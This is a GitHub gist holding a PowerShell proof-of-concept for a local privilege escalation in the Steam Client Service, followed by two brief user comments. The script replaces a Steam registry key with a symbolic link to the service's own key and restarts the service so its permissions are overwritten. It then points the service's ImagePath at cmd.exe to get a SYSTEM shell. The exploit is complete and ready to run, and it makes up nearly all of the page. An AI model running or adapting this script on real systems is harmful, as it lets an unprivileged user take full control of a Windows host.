Skip to content

Instantly share code, notes, and snippets.

@enigma0x3
Created August 7, 2019 08:16
Show Gist options
  • Save enigma0x3/03f065be011c5980b96855e2741bf302 to your computer and use it in GitHub Desktop.
Save enigma0x3/03f065be011c5980b96855e2741bf302 to your computer and use it in GitHub Desktop.
Write-Host "[*] Installing NTObjectManager..."
install-module NTObjectManager -Scope CurrentUser -Force
import-module NTObjectManager
Write-Host "[*] Removing HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"
Remove-Item -Path "HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS"
Write-Host "[*] Creating Registry Symbolic Link from HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS to HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service"
[NtApiDotNet.NtKey]::CreateSymbolicLink("\Registry\Machine\SOFTWARE\WOW6432Node\Valve\Steam\NSIS",$null, "\REGISTRY\Machine\SYSTEM\CurrentControlSet\Services\Steam Client Service")
Write-Host "[*] Registry Symbolic link created, restarting the Steam Client Service"
Get-Service "Steam Client Service" | Restart-Service
Write-Host "[*] Sleeping 5 seconds"
Start-Sleep 5
Write-Host "[*] DACL on HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service should be overwritten"
Write-Host "[*] Modifying the binPath on the Steam Client Service..."
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Steam Client Service" -Name "ImagePath" -Value "C:\Windows\System32\cmd.exe /c cmd.exe"
Write-Host "[*] binPath overwritten, restarting the service to trigger EoP. This will error out, just ignore it"
Get-Service "Steam Client Service" | Restart-Service
Write-Host "[*] Done, cmd.exe should now be running as NT AUTHORITY\SYSTEM"
@mrcbax
Copy link

mrcbax commented Aug 9, 2019

Well done. It's amazing how the simplest things get overlooked. To find such an issue in the steam client of all things is impressive. Their dedication to security means this will be patched almost immediately.

@malefficient
Copy link

Well done. It's amazing how the simplest things get overlooked. To find such an issue in the steam client of all things is impressive. Their dedication to security means this will be patched almost immediately.

😂😂😂
https://amonitoring.ru/article/steamclient-0day/

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment